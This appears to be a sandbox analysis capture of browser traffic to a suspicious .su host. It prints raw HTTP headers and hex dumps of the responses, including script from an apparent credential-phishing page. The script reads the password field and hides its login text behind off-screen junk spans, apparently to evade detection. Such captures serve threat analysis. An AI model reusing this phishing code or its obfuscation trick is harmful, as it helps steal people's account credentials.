                                                          2024-01-24 14:34:30 UTC1369INData Raw: 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 62 29 2e 6c 65 6e 67 74 68 7d 29 2c 6e 2e 67 65 74 42 79 49 64 3f 28 72 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 72 65 70 6c 61 63 65 28 5a 2c 65 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 74 7d 7d 2c 72 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 67 29 7b 76 61 72 20 6e 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 72
                                                          Data Ascii: tElementsByName||!d.getElementsByName(b).length}),n.getById?(r.filter.ID=function(e){var t=e.replace(Z,ee);return function(e){return e.getAttribute("id")===t}},r.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&g){var n=t.getElementById(e);r
                                                          2024-01-24 14:34:30 UTC1369INData Raw: 6e 67 74 68 26 26 79 2e 70 75 73 68 28 22 5b 2a 5e 24 5d 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4d 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 50 2b 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 62 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 7e 3d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 62
                                                          Data Ascii: ngth&&y.push("[*^$]="+M+"*(?:''|\"\")"),e.querySelectorAll("[selected]").length||y.push("\\["+M+"*(?:value|"+P+")"),e.querySelectorAll("[id~="+b+"-]").length||y.push("~="),e.querySelectorAll(":checked").length||y.push(":checked"),e.querySelectorAll("a#"+b
                                                          2024-01-24 14:34:30 UTC1369INData Raw: 6c 65 28 74 3d 74 2e 70 61 72 65 6e 74 4e 6f 64 65 29 69 66 28 74 3d 3d 3d 65 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 44 3d 74 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 65 3d 3d 3d 74 29 72 65 74 75 72 6e 20 66 3d 21 30 2c 30 3b 76 61 72 20 72 3d 21 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 72 7c 7c 28 31 26 28 72 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 6e 2e 73 6f 72 74 44 65 74 61 63 68 65 64
                                                          Data Ascii: le(t=t.parentNode)if(t===e)return!0;return!1},D=t?function(e,t){if(e===t)return f=!0,0;var r=!e.compareDocumentPosition-!t.compareDocumentPosition;return r||(1&(r=(e.ownerDocument||e)===(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!n.sortDetached


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          37192.168.2.649758172.67.199.1734432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:30 UTC682OUTGET /VDgyaQMqDddyxrJrBbYdMwrE/6AmLV3UL1pt/8ufkTIk4Df HTTP/1.1
                                                          Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.su
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPE
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
                                                          2024-01-24 14:34:30 UTC732INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:34:30 GMT
                                                          Content-Type: text/javascript;charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          cache-control: no-store, no-cache, must-revalidate
                                                          pragma: no-cache
                                                          vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DwNjkY5GaIveT7%2Bo6060pFkKU%2F1KWU6gvqiDRH3DdIHh1Nqr47a1cJvAykQ0G1DfljBjqMS9BLGvlgDlfKA1QBFWDxoXGAUbgLbsVLdBks7M3MjPdwV59jG22arSOXB3yatlEqCQOE7uTxnjoNxlwpHMiWPe"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 84a8ff652bb57b92-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:30 UTC637INData Raw: 34 61 63 65 0d 0a 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 24 28 27 23 65 72 64 7a 71 71 73 70 62 7a 27 29 2e 66 6f 63 75 73 28 29 3b 7d 29 3b 0d 0a 24 28 27 23 75 77 65 76 69 63 70 6d 67 6c 27 29 2e 6b 65 79 70 72 65 73 73 28 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0d 0a 09 76 61 72 20 6b 65 79 20 3d 20 65 2e 77 68 69 63 68 3b 0d 0a 09 69 66 20 28 6b 65 79 20 3d 3d 20 31 33 29 0d 0a 09 7b 6e 51 28 74 72 75 65 29 3b 7d 7d 29 3b 0d 0a 24 28 22 23 63 78 65 64 73 72 75 64 72 74 22 29 2e 63 6c 69 63 6b 28 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0d 0a 09 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0d 0a 09 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 2e 2e 2f 6b 32 43 50 49
                                                          Data Ascii: 4ace$(document).ready(function() {$('#erdzqqspbz').focus();});$('#uwevicpmgl').keypress(function(e) {var key = e.which;if (key == 13){nQ(true);}});$("#cxedsrudrt").click(function(e) {e.preventDefault();window.location.href = "../k2CPI
                                                          2024-01-24 14:34:30 UTC1369INData Raw: 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 37 72 55 34 34 52 7a 77 73 70 34 55 3c 2f 73 70 61 6e 3e 72 20 61 20 76 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 34 61 6a 31 44 79 6d 41 58 32 41 6b 3c 2f 73 70 61 6e 3e 61 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 68 5a 65 6a 42 72 62 4f 74 35 3c 2f 73 70 61 6e 3e 6c 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 67 77 69 50 55 51 36 7a 6a 4c 4a 4d 6d 49 73 3c 2f 73 70 61 6e 3e 69 3c
                                                          Data Ascii: absolute;left: -9999px;">7rU44Rzwsp4U</span>r a v<span style="position: absolute;left: -9999px;">4aj1DymAX2Ak</span>a<span style="position: absolute;left: -9999px;">hZejBrbOt5</span>l<span style="position: absolute;left: -9999px;">gwiPUQ6zjLJMmIs</span>i<
                                                          2024-01-24 14:34:30 UTC1369INData Raw: 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 31 79 67 6a 6d 7a 57 55 61 37 56 78 6a 3c 2f 73 70 61 6e 3e 6b 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 53 50 36 55 50 54 7a 45 3c 2f 73 70 61 6e 3e 79 70 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 4e 63 32 6b 31 54 44 63 41 6c 56 61 32 3c 2f 73 70 61 6e 3e 65 20 6e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 78 68
                                                          Data Ascii: <span style="position: absolute;left: -9999px;">1ygjmzWUa7Vxj</span>k<span style="position: absolute;left: -9999px;">SP6UPTzE</span>yp<span style="position: absolute;left: -9999px;">Nc2k1TDcAlVa2</span>e n<span style="position: absolute;left: -9999px;">xh
                                                          2024-01-24 14:34:30 UTC1369INData Raw: 73 70 61 6e 3e 6f 75 6e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 67 52 34 30 4c 4f 33 68 52 45 3c 2f 73 70 61 6e 3e 74 20 77 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 64 76 6d 61 39 39 77 38 71 74 3c 2f 73 70 61 6e 3e 69 74 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 72 79 7a 4a 36 56 31 52 70 4e 73 53 32 3c 2f 73 70 61 6e 3e 68 20 74 68 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39
                                                          Data Ascii: span>oun<span style='position: absolute;left: -9999px;'>gR40LO3hRE</span>t w<span style='position: absolute;left: -9999px;'>dvma99w8qt</span>it<span style='position: absolute;left: -9999px;'>ryzJ6V1RpNsS2</span>h th<span style='position: absolute;left: -9
                                                          2024-01-24 14:34:30 UTC1369INData Raw: 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 33 4f 4f 59 43 33 79 43 6d 6b 47 7a 3c 2f 73 70 61 6e 3e 63 72 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 58 65 4f 48 73 5a 44 78 37 6e 36 5a 65 3c 2f 73 70 61 6e 3e 6f 73 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 51 54 54 49 34 34 6c 4c 77 7a 63 74 3c 2f 73 70 61 6e 3e 6f 66 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 30 37 53 6f 67 38 45 59 67 47 37 3c 2f
                                                          Data Ascii: osition: absolute;left: -9999px;'>3OOYC3yCmkGz</span>cr<span style='position: absolute;left: -9999px;'>XeOHsZDx7n6Ze</span>os<span style='position: absolute;left: -9999px;'>QTTI44lLwzct</span>of<span style='position: absolute;left: -9999px;'>07Sog8EYgG7</
                                                          2024-01-24 14:34:30 UTC1369INData Raw: 70 78 3b 22 3e 4a 53 38 41 30 77 41 78 50 59 6f 62 3c 2f 73 70 61 6e 3e 73 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 48 52 49 56 71 63 39 43 52 3c 2f 73 70 61 6e 3e 73 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 49 38 53 51 41 71 6d 68 41 56 67 5a 37 3c 2f 73 70 61 6e 3e 77 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 59 31 77 43 70 49 45 65 74 66 41 3c 2f 73 70 61 6e 3e 6f 72 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c
                                                          Data Ascii: px;">JS8A0wAxPYob</span>s<span style="position: absolute;left: -9999px;">HRIVqc9CR</span>s<span style="position: absolute;left: -9999px;">I8SQAqmhAVgZ7</span>w<span style="position: absolute;left: -9999px;">Y1wCpIEetfA</span>or<span style="position: absol
                                                          2024-01-24 14:34:30 UTC1369INData Raw: 3b 0d 0a 09 09 24 28 27 23 72 65 6a 67 6b 7a 65 6e 6d 71 27 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 3b 0d 0a 09 7d 0d 0a 7d 0d 0a 66 75 6e 63 74 69 6f 6e 20 63 6c 6f 73 65 42 6f 78 28 29 20 7b 0d 0a 09 24 28 27 23 70 6f 70 75 70 31 27 29 2e 63 73 73 28 27 76 69 73 69 62 69 6c 69 74 79 27 2c 20 27 68 69 64 64 65 6e 27 29 2e 63 73 73 28 27 6f 70 61 63 69 74 79 27 2c 20 30 29 3b 0d 0a 09 24 28 27 23 75 77 65 76 69 63 70 6d 67 6c 27 29 2e 66 6f 63 75 73 28 29 3b 0d 0a 7d 0d 0a 66 75 6e 63 74 69 6f 6e 20 63 68 65 63 6b 53 75 62 6d 69 74 28 29 20 7b 0d 0a 09 76 61 72 20 70 77 64 20 3d 20 24 28 27 23 65 72 64 7a 71 71 73 70 62 7a 27 29 2e 76 61 6c 28 29 3b 0d 0a 09 76 61 72 20 70 77 45 72 72 6f 72 20 3d 20 27 50 3c 73 70 61 6e 20
                                                          Data Ascii: ;$('#rejgkzenmq').css('display', 'none');}}function closeBox() {$('#popup1').css('visibility', 'hidden').css('opacity', 0);$('#uwevicpmgl').focus();}function checkSubmit() {var pwd = $('#erdzqqspbz').val();var pwError = 'P<span
                                                          2024-01-24 14:34:30 UTC1369INData Raw: 6b 6d 75 6a 27 29 2e 74 65 78 74 28 27 27 29 3b 0d 0a 09 09 24 28 27 23 65 72 64 7a 71 71 73 70 62 7a 27 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 68 61 73 2d 65 72 72 6f 72 27 29 3b 0d 0a 09 09 24 28 27 23 72 65 6a 67 6b 7a 65 6e 6d 71 27 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 62 6c 6f 63 6b 27 29 3b 0d 0a 09 09 72 65 74 75 72 6e 20 74 72 75 65 3b 0d 0a 09 7d 20 65 6c 73 65 20 7b 0d 0a 09 09 24 28 27 23 6d 70 7a 6f 6b 65 6b 6d 75 6a 27 29 2e 68 74 6d 6c 28 70 77 45 72 72 6f 72 29 3b 0d 0a 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0d 0a 09 7d 0d 0a 7d 0d 0a 66 75 6e 63 74 69 6f 6e 20 69 73 45 6d 61 69 6c 28 69 6e 70 75 74 29 20 7b 0d 0a 0d 0a 20 20 20 20 76 61 72 20 65 6d 72 65 67 20 3d 20 2f 5e 28 5b 61 2d 7a 41 2d 5a 30 2d 39 5f 2e
                                                          Data Ascii: kmuj').text('');$('#erdzqqspbz').removeClass('has-error');$('#rejgkzenmq').css('display', 'block');return true;} else {$('#mpzokekmuj').html(pwError);return false;}}function isEmail(input) { var emreg = /^([a-zA-Z0-9_.
                                                          2024-01-24 14:34:30 UTC1369INData Raw: 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 35 67 34 67 59 30 72 67 79 64 47 61 3c 2f 73 70 61 6e 3e 6e 27 29 0d 0a 09 09 09 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 74 68 69 73 29 0d 0a 09 09 09 2e 61 64 64 43 6c 61 73 73 28 27 62 74 6e 20 62 74 6e 2d 62 6c 6f 63 6b 20 62 74 6e 2d 70 72 69 6d 61 72 79 27 29 3b 0d 0a 09 7d 29 2e 72 65 6d 6f 76 65 28 29 3b 0d 0a 09 76 61 72 20 78 72 72 20 3d 20 65 6d 61 69 6c 2e 73 70 6c 69 74 28 27 27 29 2e 6a 6f 69 6e 28 27 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 31 42 4b 61 37 61 4c 5a 4f 4d 53 66 5a 3c 2f 73 70 61 6e 3e 27 29 3b 0d 0a 09 24 28 27 23 78 6a 6b 69 6e 73 67 6a 6d 6c 27
                                                          Data Ascii: absolute;left: -9999px;">5g4gY0rgydGa</span>n').insertBefore(this).addClass('btn btn-block btn-primary');}).remove();var xrr = email.split('').join('<span style="position: absolute;left: -9999px;">1BKa7aLZOMSfZ</span>');$('#xjkinsgjml'
                                                          2024-01-24 14:34:30 UTC1369INData Raw: 46 34 66 72 52 37 72 4e 42 3c 2f 73 70 61 6e 3e 6b 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 70 43 39 51 4e 45 78 71 61 3c 2f 73 70 61 6e 3e 65 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 4c 30 57 31 52 36 68 4f 49 70 3c 2f 73 70 61 6e 3e 64 20 74 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 59 7a 58 52 76 36 59 32 70 64 38 48 69 5a 4e 3c 2f 73 70 61 6e 3e 6f 20 70 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b
                                                          Data Ascii: F4frR7rNB</span>k<span style="position: absolute;left: -9999px;">pC9QNExqa</span>e<span style="position: absolute;left: -9999px;">L0W1R6hOIp</span>d t<span style="position: absolute;left: -9999px;">YzXRv6Y2pd8HiZN</span>o p<span style="position: absolute;


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          38192.168.2.649761172.67.199.1734432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:31 UTC750OUTGET /VDgyaQMqDddyxrJrBbYdMwrE/6zszKQogk5hPX/5ksp3DD5a7cAYqnU HTTP/1.1
                                                          Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.su
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPE
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
                                                          2024-01-24 14:34:31 UTC695INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:34:31 GMT
                                                          Content-Type: image/png
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          cache-control: no-store, no-cache, must-revalidate
                                                          pragma: no-cache
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3RkRIaUgQo6o3MJLwj9%2FXPA6ycNfMzQTgM4knCGmZqig5jnm%2FzjTiz1%2BSnSfyXJLuYGaGmPTPZTsZNnSdZANohix%2FvfSKR9j4%2B0uj3ij5cZJiyT9Cu51Ia9NthntHLZ7zocJspdNuYHzycEHoDKxlKz4vqnS"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 84a8ff6acff4675b-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:31 UTC674INData Raw: 33 31 33 63 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 0a 00 00 00 01 b2 08 06 00 00 00 28 51 9d 5c 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 25 74 45 58 74 64 61 74 65 3a 6d 6f 64 69 66 79 00 32 30 32 32 2d 30 37 2d 30 38 54 30 30 3a 33 31 3a 35 39 2b 30 30 3a 30 30 c1 e4 45 42 00 00 00 25 74 45 58 74 64 61 74 65 3a 63 72 65 61 74 65 00 32 30 32 32 2d 30 37 2d 30 38 54 30 30 3a 33 31 3a 35 39 2b 30 30 3a 30 30 b0 b9 fd fe 00 00 ff 43 49 44 41 54 78 5e ec dd 07 78 55 45 b7 f0 f1 15 d2 48 02 29 24 81 50 42 ef bd 57 e9 4d b0 63 6f 20 0a a8 88 5d b1 a2 28 2a 76 2c 58 51 50 04 45 c1 ae 60 a1 f7 5e 42 0b 10 42 4b 20 09 09 e9 09
                                                          Data Ascii: 313cPNGIHDR(Q\gAMAasRGBpHYs%%IR$%tEXtdate:modify2022-07-08T00:31:59+00:00EB%tEXtdate:create2022-07-08T00:31:59+00:00CIDATx^xUEH)$PBWMco ](*v,XQPE`^BBK
                                                          2024-01-24 14:34:31 UTC1369INData Raw: e4 eb 67 a0 a8 a4 c0 6e 4d 42 a5 47 b3 30 e9 dc b4 8a 74 73 fc 0c 0f f1 d3 cf 02 00 00 00 00 00 00 00 00 00 00 00 b8 37 12 00 01 c0 20 c7 33 0a 64 c9 b6 54 59 1a 93 26 4b 62 52 65 6f 62 ae 7e 06 67 c2 cb 4b a4 7d 83 10 e9 df 36 c2 f1 88 94 ee 2d aa 48 a0 bf b7 7e 16 00 00 00 00 00 00 00 00 00 00 00 c0 bd 90 00 08 00 2e a6 aa fc 7d bf 3a 49 be 5e 75 4c 96 ed 38 21 7c 2c 97 1d 1f 9f 0a 72 41 b3 30 19 d2 b1 aa 0c ed 5c 55 9a d7 09 d6 cf 00 00 00 00 00 00 00 00 00 00 00 00 d8 1f 09 80 00 e0 02 87 53 f2 e4 a7 b5 c9 32 77 e5 51 59 b1 53 25 fd e9 27 50 ae ea 54 0d 90 a1 56 32 60 35 19 d8 3e 52 7c 7d 2a e8 67 00 00 00 00 00 00 00 00 00 00 00 00 ec 87 04 40 00 70 92 b4 cc 42 99 bd 38 41 3e 5d 74 44 b6 c6 67 e9 51 b8 4a 70 a0 af 5c dd 23 4a ae e9 5d 53 fa b6 8d 10
                                                          Data Ascii: gnMBG0ts7 3dTY&KbReob~gK}6-H~.}:I^uL8!|,rA0\US2wQYS%'PTV2`5>R|}*g@pB8A>]tDgQJp\#J]S
                                                          2024-01-24 14:34:31 UTC1369INData Raw: 7a 3b 46 66 2d 4d d4 23 80 7b 19 d4 2e 42 66 3e dc 5e 22 43 fd f5 08 00 00 00 00 00 00 00 00 00 00 00 f0 64 24 00 02 70 0b fb 12 73 e4 9a e7 37 4a cc c1 6c 3d 02 b8 a7 e8 c8 00 99 f3 68 07 5a 02 03 00 00 00 00 00 00 00 00 00 00 00 12 00 01 d8 df 37 2b 8f c9 2d 53 b6 4a 6e 7e b1 1e 01 dc 9b 8f 4f 05 79 ed b6 66 32 ee b2 fa 7a 04 00 00 00 00 00 00 00 00 00 00 00 78 22 12 00 01 d8 96 fa f4 9a f2 cd 7e 19 3f 7d b7 e3 9a 8f 32 78 9e 9b fa d4 94 f7 ee 6d 23 81 fe de 7a 04 00 00 00 00 00 00 00 00 00 00 00 78 12 12 00 01 d8 52 41 51 a9 dc f5 f6 36 99 b1 30 41 8f 00 9e a9 43 c3 10 f9 f6 a9 4e 52 33 22 40 8f 00 00 00 00 00 00 00 00 00 00 00 00 4f 41 02 20 00 db c9 c8 2e 94 2b 9f db 28 4b b7 a7 e9 11 c0 b3 55 0f af 28 df 3c d9 49 3a 37 09 d5 23 00 00 00 00 00 00 00
                                                          Data Ascii: z;Ff-M#{.Bf>^"Cd$ps7Jl=hZ7+-SJn~Oyf2zx"~?}2xm#zxRAQ60ACNR3"@OA .+(KU(<I:7#
